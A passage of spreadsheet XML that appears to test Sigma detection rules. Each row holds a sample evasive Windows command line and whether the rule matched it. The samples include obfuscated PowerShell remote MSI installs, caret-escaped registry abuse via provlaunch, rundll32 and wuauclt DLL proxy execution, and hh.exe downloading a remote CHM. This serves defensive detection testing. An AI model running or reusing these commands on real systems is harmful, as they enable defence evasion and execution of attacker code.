          <t>InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b); InfDefaultInstall.exe .inf Execution (ce7cf472-6fcc-490a-9481-3786840b5d9b)</t>
        </is>
      </c>
      <c r="J1801" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1801" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1802" ht="15.75" customHeight="1" s="42">
      <c r="A1802" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1802" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C1802" s="36" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D1802" s="36" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E1802" s="36" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe "C:\AtomicRedTeam\atomics\T1218\src\Infdefaultinstall.in""f"</t>
        </is>
      </c>
      <c r="F1802" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1802" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1802" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1802" s="43" t="n"/>
      <c r="J1802" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1802" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1803" ht="15.75" customHeight="1" s="42">
      <c r="A1803" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1803" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_mofcomp_execution</t>
        </is>
      </c>
      <c r="C1803" s="36" t="inlineStr">
        <is>
          <t>Potential Suspicious Mofcomp Execution</t>
        </is>
      </c>
      <c r="D1803" s="36" t="inlineStr">
        <is>
          <t>1dd05363-104e-4b4a-b963-196a534b03a1</t>
        </is>
      </c>
      <c r="E1803" s="36" t="inlineStr">
        <is>
          <t>mofcomp.exe C:\WINDOWS\Temp\..\..\AtomicRedTeam\atomics\T1546.003\src\T1546.003.mof</t>
        </is>
      </c>
      <c r="F1803" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1803" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1803" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1803" s="36" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J1803" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1803" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1804" ht="15.75" customHeight="1" s="42">
      <c r="A1804" s="43" t="n"/>
      <c r="B1804" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1804" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1804" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1804" s="36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1804" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1804" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1804" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1804" s="36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804" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1804" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1805" ht="15.75" customHeight="1" s="42">
      <c r="A1805" s="36" t="n"/>
      <c r="B1805" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1805" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1805" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1805" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F1805" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1805" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1805" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1805" s="36" t="n"/>
      <c r="J1805" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1805" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1806" ht="15.75" customHeight="1" s="42">
      <c r="A1806" s="43" t="n"/>
      <c r="B1806" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1806" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1806" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1806" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F1806" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1806" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1806" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1806" s="43" t="n"/>
      <c r="J1806" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1806" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1807" ht="15.75" customHeight="1" s="42">
      <c r="A1807" s="36" t="n"/>
      <c r="B1807" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1807" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1807" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1807" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -c "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F1807" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1807" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1807" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1807" s="43" t="n"/>
      <c r="J1807" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1807" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1808" ht="15.75" customHeight="1" s="42">
      <c r="A1808" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1808" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_provlaunch_provisioning_command</t>
        </is>
      </c>
      <c r="C1808" s="36" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution</t>
        </is>
      </c>
      <c r="D1808" s="36" t="inlineStr">
        <is>
          <t>2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25</t>
        </is>
      </c>
      <c r="E1808" s="36" t="inlineStr">
        <is>
          <t>"cmd.exe" /c reg.exe add "HKLM\SOFTWARE\Microsoft\Provisioning\Commands\"LOLBin\dummy1 /v altitude /t REG_DWORD /d 0 &amp; reg add "HKLM\SOFTWARE\Microsoft\Provisioning\Commands\"LOLBin\dummy1\dummy2 /v Commandline /d calc.exe &amp; c:\windows\system32\provlaunch.exe LOLBin</t>
        </is>
      </c>
      <c r="F1808" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1808" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1808" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1808" s="36" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution (2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25); Potential Provisioning Registry Key Abuse For Binary Proxy Execution (2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25)</t>
        </is>
      </c>
      <c r="J1808" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1808" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1809" ht="15.75" customHeight="1" s="42">
      <c r="A1809" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1809" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_provlaunch_provisioning_command</t>
        </is>
      </c>
      <c r="C1809" s="36" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution</t>
        </is>
      </c>
      <c r="D1809" s="36" t="inlineStr">
        <is>
          <t>2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25</t>
        </is>
      </c>
      <c r="E1809" s="36" t="inlineStr">
        <is>
          <t>"cmd.exe" /c reg.exe add HKLM\SOF^TWARE\Micro^soft\Provi^sioning\Com^mands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0 &amp; reg add HKLM\SOF^TWARE\Micro^soft\Provi^sioning\Com^mands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe &amp; c:\windows\system32\provlaunch.exe LOLBin</t>
        </is>
      </c>
      <c r="F1809" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1809" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1809" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1809" s="43" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution (2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25)</t>
        </is>
      </c>
      <c r="J1809" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1809" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1810" ht="15.75" customHeight="1" s="42">
      <c r="A1810" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1810" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_provlaunch_provisioning_command</t>
        </is>
      </c>
      <c r="C1810" s="36" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution</t>
        </is>
      </c>
      <c r="D1810" s="36" t="inlineStr">
        <is>
          <t>2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25</t>
        </is>
      </c>
      <c r="E1810" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Item -Path 'HKLM:\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1' -Force; New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1' -Name 'altitude' -Value 0 -PropertyType DWord -Force; New-Item -Path 'HKLM:\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2' -Force; New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2' -Name 'Commandline' -Value 'calc.exe' -PropertyType String -Force; &amp; c:\windows\system32\provlaunch.exe LOLBin"</t>
        </is>
      </c>
      <c r="F1810" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1810" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1810" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1810" s="43" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution (2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25); Potential Provisioning Registry Key Abuse For Binary Proxy Execution (2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25)</t>
        </is>
      </c>
      <c r="J1810" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1810" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1811" ht="15.75" customHeight="1" s="42">
      <c r="A1811" s="43" t="n"/>
      <c r="B1811" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_verclsid_runs_com</t>
        </is>
      </c>
      <c r="C1811" s="36" t="inlineStr">
        <is>
          <t>Verclsid.exe Runs COM Object</t>
        </is>
      </c>
      <c r="D1811" s="36" t="inlineStr">
        <is>
          <t>d06be4b9-8045-428b-a567-740a26d9db25</t>
        </is>
      </c>
      <c r="E1811" s="36" t="inlineStr">
        <is>
          <t>verclsid.exe -S -C {11111111-2222-3333-4444-555555555555}</t>
        </is>
      </c>
      <c r="F1811" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1811" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1811" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1811" s="43" t="n"/>
      <c r="J1811" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1811" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1812" ht="15.75" customHeight="1" s="42">
      <c r="A1812" s="43" t="n"/>
      <c r="B1812" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_child_processes_anomalies</t>
        </is>
      </c>
      <c r="C1812" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Child Process Of VsCode</t>
        </is>
      </c>
      <c r="D1812" s="36" t="inlineStr">
        <is>
          <t>5a3164f2-b373-4152-93cf-090b13c12d27</t>
        </is>
      </c>
      <c r="E1812" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c r^undll32.exe C:\ProgramData\payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F1812" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1812" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1812" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1812" s="43" t="n"/>
      <c r="J1812" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1812" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1813" ht="15.75" customHeight="1" s="42">
      <c r="A1813" s="43" t="n"/>
      <c r="B1813" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_vslsagent_agentextensionpath_load</t>
        </is>
      </c>
      <c r="C1813" s="36" t="inlineStr">
        <is>
          <t>Suspicious Vsls-Agent Command With AgentExtensionPath Load</t>
        </is>
      </c>
      <c r="D1813" s="36" t="inlineStr">
        <is>
          <t>43103702-5886-11ed-9b6a-0242ac120002</t>
        </is>
      </c>
      <c r="E1813" s="36" t="inlineStr">
        <is>
          <t>copy vsls-agent.exe renamed-agent.exe &amp;&amp; renamed-agent.exe --agentExtensionPath C:\evil.dll</t>
        </is>
      </c>
      <c r="F1813" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1813" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1813" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1813" s="43" t="n"/>
      <c r="J1813" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1813" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1814" ht="15.75" customHeight="1" s="42">
      <c r="A1814" s="43" t="n"/>
      <c r="B1814" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wlrmdr_uncommon_child_process</t>
        </is>
      </c>
      <c r="C1814" s="36" t="inlineStr">
        <is>
          <t>Wlrmdr.EXE Uncommon Argument Or Child Process</t>
        </is>
      </c>
      <c r="D1814" s="36" t="inlineStr">
        <is>
          <t>9cfc00b6-bfb7-49ce-9781-ef78503154bb</t>
        </is>
      </c>
      <c r="E1814" s="36" t="inlineStr">
        <is>
          <t>wlrmdr.exe -s 1 -f 1 -t 1 -m 1 -a 1</t>
        </is>
      </c>
      <c r="F1814" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1814" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1814" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1814" s="43" t="n"/>
      <c r="J1814" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1814" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1815" ht="15.75" customHeight="1" s="42">
      <c r="A1815" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1815" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C1815" s="36" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D1815" s="36" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E1815" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c wuauclt.exe /UpdateDe^ploymentProvider "C:\AtomicRedTeam\atomics\T1218_x0008_in\calc.dll" /RunHandlerComServer</t>
        </is>
      </c>
      <c r="F1815" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1815" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1815" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1815" s="43" t="n"/>
      <c r="J1815" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1815" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1816" ht="15.75" customHeight="1" s="42">
      <c r="A1816" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1816" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C1816" s="36" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D1816" s="36" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E1816" s="36" t="inlineStr">
        <is>
          <t>wuauclt.exe /"UpdateDeploymentProvider" "C:\AtomicRedTeam\atomics\T1218_x0008_in\calc.dll" /"RunHandlerComServer"</t>
        </is>
      </c>
      <c r="F1816" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1816" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1816" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1816" s="43" t="n"/>
      <c r="J1816" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1816" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1817" ht="15.75" customHeight="1" s="42">
      <c r="A1817" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1817" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C1817" s="43" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D1817" s="43" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E1817" s="43" t="inlineStr">
        <is>
          <t>wuauclt.exe -UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218_x0008_in\calc.dll" -RunHandlerComServer</t>
        </is>
      </c>
      <c r="F1817" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1817" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1817" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1817" s="43" t="n"/>
      <c r="J1817" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1817" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1818" ht="15.75" customHeight="1" s="42">
      <c r="A1818" s="36" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B1818" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C1818" s="36" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D1818" s="36" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E1818" s="43" t="inlineStr">
        <is>
          <t>wuauclt.exe /RunHandlerComServer /UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218_x0008_in\calc.dll"</t>
        </is>
      </c>
      <c r="F1818" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1818" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1818" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1818" s="43" t="n"/>
      <c r="J1818" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1818" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1819" ht="15.75" customHeight="1" s="42">
      <c r="A1819" s="43" t="n"/>
      <c r="B1819" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_xwizard_runwizard_com_object_exec</t>
        </is>
      </c>
      <c r="C1819" s="36" t="inlineStr">
        <is>
          <t>COM Object Execution via Xwizard.EXE</t>
        </is>
      </c>
      <c r="D1819" s="36" t="inlineStr">
        <is>
          <t>53d4bb30-3f36-4e8a-b078-69d36c4a79ff</t>
        </is>
      </c>
      <c r="E1819" s="43" t="inlineStr">
        <is>
          <t>xwizard RunWizard "{53d4bb30 - 3f36 - 4e8a - b078 - 69d36c4a79ff}"</t>
        </is>
      </c>
      <c r="F1819" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1819" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1819" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1819" s="43" t="n"/>
      <c r="J1819" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1819" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1820" ht="15.75" customHeight="1" s="42">
      <c r="A1820" s="43" t="n"/>
      <c r="B1820" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_xwizard_runwizard_com_object_exec</t>
        </is>
      </c>
      <c r="C1820" s="36" t="inlineStr">
        <is>
          <t>COM Object Execution via Xwizard.EXE</t>
        </is>
      </c>
      <c r="D1820" s="36" t="inlineStr">
        <is>
          <t>53d4bb30-3f36-4e8a-b078-69d36c4a79ff</t>
        </is>
      </c>
      <c r="E1820" s="43" t="inlineStr">
        <is>
          <t>xwizard.exe RunWizard {a1b2c3d4-e5f6-7890-abcd-ef1234567890}</t>
        </is>
      </c>
      <c r="F1820" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1820" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1820" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1820" s="43" t="inlineStr">
        <is>
          <t>Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4); Weak or Abused Passwords In CLI (91edcfb1-2529-4ac2-9ecc-7617f895c7e4)</t>
        </is>
      </c>
      <c r="J1820" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1820" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1821" ht="15.75" customHeight="1" s="42">
      <c r="A1821" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B1821" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C1821" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1821" s="36" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E1821" s="43" t="inlineStr">
        <is>
          <t>hh.exe -decompile C:\Users	haim\AppData\Local\Temp "C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.ch""m"</t>
        </is>
      </c>
      <c r="F1821" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1821" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1821" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1821" s="43" t="n"/>
      <c r="J1821" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1821" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1822" ht="15.75" customHeight="1" s="42">
      <c r="A1822" s="36" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B1822" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C1822" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1822" s="36" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E1822" s="43" t="inlineStr">
        <is>
          <t>hh.exe -decompile C:\Users	haim\AppData\Local\Temp "\?\C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm."</t>
        </is>
      </c>
      <c r="F1822" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1822" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1822" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1822" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1822" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1822" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1823" ht="15.75" customHeight="1" s="42">
      <c r="A1823" s="43" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B1823" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_remote_download_or_execution</t>
        </is>
      </c>
      <c r="C1823" s="36" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE</t>
        </is>
      </c>
      <c r="D1823" s="36" t="inlineStr">
        <is>
          <t>f57c58b3-ee69-4ef5-9041-455bf39aaa89</t>
        </is>
      </c>
      <c r="E1823" s="43" t="inlineStr">
        <is>
          <t>hh.exe h""ttps://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm)</t>
        </is>
      </c>
      <c r="F1823" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1823" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1823" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1823" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1823" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1823" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1824" ht="15.75" customHeight="1" s="42">
      <c r="A1824" s="36" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B1824" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_remote_download_or_execution</t>
        </is>
      </c>
      <c r="C1824" s="36" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE</t>
        </is>
      </c>
      <c r="D1824" s="36" t="inlineStr">
        <is>
          <t>f57c58b3-ee69-4ef5-9041-455bf39aaa89</t>
        </is>
      </c>
      <c r="E1824" s="36" t="inlineStr">
        <is>
          <t>hh.exe //[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm)</t>
        </is>
      </c>
      <c r="F1824" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1824" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1824" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1824" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1824" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1824" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1825" ht="15.75" customHeight="1" s="42">
      <c r="A1825" s="36" t="n"/>
      <c r="B1825" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1825" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1825" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1825" s="36" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F1825" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1825" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1825" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1825" s="36" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1825" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1825" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1826" ht="15.75" customHeight="1" s="42">
      <c r="A1826" s="36" t="n"/>
      <c r="B1826" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
